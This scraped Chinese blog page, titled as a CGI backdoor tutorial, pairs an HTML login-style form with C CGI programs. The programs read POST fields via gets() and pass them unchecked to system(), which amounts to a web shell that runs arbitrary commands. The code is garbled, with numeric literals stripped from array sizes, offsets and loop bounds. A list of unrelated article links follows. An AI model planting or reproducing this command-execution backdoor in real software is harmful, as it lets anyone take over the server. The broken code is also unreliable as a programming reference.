1.html代码

<form id = "form" name="form" method="post" action="../cgi-bin/Hello.cgi">

<p></p>

<input type="text" name="cmd1" id="user" value= "用户名"/>

<p></p>

<input type="text" name="cmd2" id="pass" value= "密码"/>

<p></p>

<input type="submit" name="go" id= "Hello" value="进入">

</form>

2.C代码

#define  _CRT_SECURE_NO_WARNINGS

#include<stdio.h>

#include<stdlib.h>

#include<time.h>

//..上一层目录

//"cmd1=123&cmd2=456&go=%BD%F8%C8%EB"

void main123()

{

    printf("Content-type:text/html\n\n");//换行

    char szpost[] = {  };

    gets(szpost);

    printf("%s", szpost);

    char*p1 = strchr(szpost, '&');

    if (*p1 != NULL)

    {

        *p1 = '\0';

    }

    printf("<br>%s", szpost + );

    char *p2 = strchr(p1 + , '&');

    if (*p2!=NULL)

    {

        *p2 = '\0';

    }

    printf("<br>%s", p1+);

    //system(szpost + 5);

    char cmd[] = {  };

    time_t ts;

    unsigned data = time(&ts);

    srand(&ts);

    int num = rand();

    sprintf(cmd, "%s %s >%d.txt", szpost + , p1 + , num);

    char filename[] = {  };

    sprintf(filename, "%d.txt", num);

    system(cmd);

    FILE *pf = fopen(filename, "r");

    while (!feof(pf))

    {

        char ch = fgetc(pf);

        if (ch == '\n')

        {

            printf("<br>");

        }

        else

        {

            putchar(ch);

        }

    }

    fclose(pf);

}

void main3()

{

    printf("Content-type:text/html\n\n");//换行

    char szpost[] = {  };

    gets(szpost);

    printf("%s", szpost);

    char*p1 = strchr(szpost, '&');

    if (*p1!=NULL)

    {

        *p1 = '\0';

    }

    printf("<br>%s", szpost + );

    //system(szpost + 5);

    char cmd[] = {  };

    time_t ts;

    unsigned data = time(&ts);

    srand(&ts);

    int num = rand();

    sprintf(cmd, "%s >%d.txt", szpost + ,num);

    char filename[] = {  };

    sprintf(filename,"%d.txt", num);

    system(cmd);

    FILE *pf = fopen(filename, "r");

    while (!feof(pf))

    {

        char ch = fgetc(pf);

        if (ch=='\n')

        {

            printf("<br>");

        }

        else

        {

            putchar(ch);

        }

    }

    fclose(pf);

}

void main2()

{

    printf("Content-type:text/html\n\n");//换行

    char szpost[] = {  };

    gets(szpost);

    printf("%s", szpost);

}

//重定向输出

//输入

void main()

{

    printf("Content-type:text/html\n\n");//换行

    for (int i = ; i < ; i++)

    {

        //printf("锄禾日当午\n");

        printf("锄禾日当午<br>");

    }

}

服务器开发之CGI后门的更多相关文章

  1. 高性能服务器开发之C++定时器

    高性能服务器开发之C++定时器 来源: https://www.cnblogs.com/junye/p/5836552.html 写这篇文章前搜了下网上类似的文章,有很多,所以笔者的这篇文章就不对定时 ...

  2. JSON的服务器开发之路

    JSON的服务器开发之路 不知道需要哪儿些包... /dcywpt/WebRoot/WEB-INF/lib/commons-collections-3.2.jar /dcywpt/WebRoot/WE ...

  3. C语言进行站点开发之cgi

     安装Apach 配置ApacheRuntime 以下的过程中一直点击next 配置CGI,放开配置:AddHandler cgi-script .cgi watermark/2/text/aHR ...

  4. JavaEE开发之SpringMVC中的静态资源映射及服务器推送技术

    在上篇博客中,我们聊了<JavaEE开发之SpringMVC中的自定义拦截器及异常处理>.本篇博客我们继续的来聊SpringMVC的东西,下方我们将会聊到js.css这些静态文件的加载配置 ...

  5. Android安全开发之WebView中的地雷

    Android安全开发之WebView中的地雷 0X01 About WebView 在Android开发中,经常会使用WebView来实现WEB页面的展示,在Activiry中启动自己的浏览器,或者 ...

  6. 微信公众号开发之VS远程调试

    目录 (一)微信公众号开发之VS远程调试 (二)微信公众号开发之基础梳理 (三)微信公众号开发之自动消息回复和自定义菜单 前言 微信公众平台消息接口的工作原理大概可以这样理解:从用户端到公众号端一个流 ...

  7. Android安全开发之ZIP文件目录遍历

    1.ZIP文件目录遍历简介 因为ZIP压缩包文件中允许存在“../”的字符串,攻击者可以利用多个“../”在解压时改变ZIP包中某个文件的存放位置,覆盖掉应用原有的文件.如果被覆盖掉的文件是动态链接s ...

  8. Cocos2d-x 3.x游戏开发之旅

    Cocos2d-x 3.x游戏开发之旅 钟迪龙 著   ISBN 978-7-121-24276-2 2014年10月出版 定价:79.00元 516页 16开 内容提要 <Cocos2d-x ...

  9. iOS开发之Socket通信实战--Request请求数据包编码模块

    实际上在iOS很多应用开发中,大部分用的网络通信都是http/https协议,除非有特殊的需求会用到Socket网络协议进行网络数 据传输,这时候在iOS客户端就需要很好的第三方CocoaAsyncS ...

随机推荐

  1. python的while循环

    age_of_laochuanzhang = 56 conut = 0 while True: if conut == 3: print("输入次数上限") break age = ...

  2. org.springframework.data.redis.serializer.SerializationException: Cannot serialize;

    前言 本文中提到的解决方案,源码地址在:perfect-ssm,希望可以帮你解决问题. 问题描述 在Spring与Redis整合过程中,出现了如下报错: org.springframework.dat ...

  3. java保留两位小数(不四舍五入)

    import java.text.DecimalFormat; import java.math.RoundingMode; class Text{ public static void main(S ...

  4. TCP/IP(六)应用层(DNS和HTTP协议)

    前言 到这一篇我已经把TCP/IP五层模型详细的说明了一遍,大体的从物理层到最上层的应用层做了一个大概的了解,其实总体学下来东西非常的多,我们需要经常的去系统性的去学习它.不然过一段时间就忘记了! 回 ...

  5. DFS中的奇偶剪枝学习笔记

    奇偶剪枝学习笔记 描述 编辑 现假设起点为(sx,sy),终点为(ex,ey),给定t步恰好走到终点, s | | | + — — — e 如图所示(“|”竖走,“—”横走,“+”转弯),易证abs( ...

  6. bzoj usaco 金组水题题解(2.5)

    bzoj 2197: [Usaco2011 Mar]Tree Decoration 树形dp..f[i]表示处理完以i为根的子树的最小时间. 因为一个点上可以挂无数个,所以在点i上挂东西的单位花费就是 ...

  7. SSH私用私钥登陆

    1.导入私钥,将私钥文件放到当前登陆用户目录下的.ssh目录下 2.指定私钥登陆,ssh -i .ssh/ssh_rsa  root@target.com 如果出现了下面这种情况 这是因为私钥文件权限 ...

  8. dedecms织梦首页如何调用文章列表?

    如果冯耀宗博客类似,首页调用文章列表,同时也有许多企业站需要调用文章列表,今天我与大家来分享一下dedecms织梦首页如何调用文章列表? {dede:arclist     row='16'  tit ...

  9. 图文教程:在Mac上搭建Titanium的iOS开发环境

    http://mobile.51cto.com/web-317170_all.htm 跨平台开发工具Titanium的兴起之路:HTML 5是最大威胁 比较Titanium和PhoneGap两大iOS ...

  10. Sublime Text 2激活、插件包安装、以及快捷键

    http://jingyan.baidu.com/article/ff4116259b057c12e48237b8.html Sublime Text作为一款轻量.简洁.高效.跨平台的编辑器.支持N多 ...